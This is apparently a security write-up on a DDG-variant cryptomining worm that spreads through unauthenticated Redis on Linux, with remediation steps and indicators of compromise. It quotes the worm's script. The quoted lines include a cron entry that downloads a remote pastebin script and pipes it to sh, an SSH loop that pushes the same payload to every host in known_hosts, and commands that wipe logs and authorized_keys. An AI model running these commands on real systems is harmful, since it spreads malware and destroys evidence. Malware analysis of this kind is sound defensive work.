How the DDG Variant Malware Infects Linux Servers and How to Clean It

Incident Overview

On 21 February 2019 a DDG‑variant mining worm spread across Linux systems. The worm first scans for Redis instances that allow unauthenticated access, writes a malicious /etc/ld.so.preload entry that points to /usr/local/lib/libioset.so, and then uses the compromised Redis server to inject its payload.

Malicious Artifacts

LD_PRELOAD hijack file: /etc/ld.so.preload → /usr/local/lib/libioset.so Binary files: /tmp/watchdogs, /usr/sbin/watchdogs, /tmp/ksoftirqds Cron job files: /etc/cron.d/tomcat, /etc/cron.d/root, /var/spool/cron/root, /var/spool/cron/crontabs/root,

/etc/rc.d/init.d/watchdogs

Payload Delivery

The worm downloads a base64‑encoded script from https://pastebin.com/raw/sByq0rym every 15 minutes and executes it via a cron entry.

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym || wget -q -O- https://pastebin.com/raw/sByq0rym) | sh" | crontab -

Malware Behavior

The downloaded script performs the following actions:

Kills existing mining or DDoS processes using ps | grep | awk '{print $2}' | xargs kill -9 pipelines.

Locks critical files with chattr -i and disables high‑resource services.

Downloads a UPX‑packed Monero miner disguised as an image, makes it executable, and runs it in the background.

Harvests IP addresses from /root/.ssh/known_hosts and attempts lateral propagation by SSH‑ing to each host with a 5‑second timeout, executing the same payload.

Clears logs and mail files to hide activity.

# Example of killing known malicious processes
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
# ... many similar lines omitted ...

# Unlock and remove protected files
chattr -i /etc/cron.d/root
chattr -i /etc/cron.d/system
chattr -i /etc/ld.so.preload
# Conditional high‑CPU kill
if [ ${p} -eq 0 ]; then
    ps auxf | grep -v grep | awk '{if($3>=80.0) print $2}' | xargs kill -9
fi

# Lateral propagation via SSH
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do
    ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://pastebin.com/raw/sByq0rym || wget -q -O- https://pastebin.com/raw/sByq0rym) | sh > /dev/null 2>&1 &"
  done
fi
echo 0 >/root/.ssh/authorized_keys
# Clear logs
echo 0 >/var/spool/mail/root
echo 0 >/var/log/wtmp
echo 0 >/var/log/secure
echo 0 >/var/log/cron

Remediation Steps

Use the open‑source cleaning tool provided at https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool to automate removal of the malicious files and restore system attributes.

Restrict Redis to listen only on localhost and set a password in /etc/redis.conf (e.g., bind 127.0.0.1 and requirepass <your‑password>), then restart the Redis service.

Perform a network‑wide scan for unauthenticated Redis instances and patch them.

In emergency situations, isolate infected hosts from the network to stop further lateral spread.

Remove /root/.ssh/known_hosts and any private keys if they are not required for legitimate operations.

Deploy a static BusyBox binary to /bin/ and use it to delete files, as BusyBox bypasses the ld.so.preload hijack.

Indicators of Compromise (IOCs)

Domain: http://thyrsi.com IP address: 47.110.190.245 Mining pool: xmr.f2pool.com MD5 hashes of known malicious binaries:

aee3a19beb22527a1e0feac76344894c

86e2f5859ca276f307a034b5c7c450f1

ae356f2499b2228e86bcc4d61f4a29c9

d6a146161ec201f9b3f20fbfd528f901

a48f529646b8b5e96bab67d6d517a975

04ca88d563b568bac6d1f64faf4d390e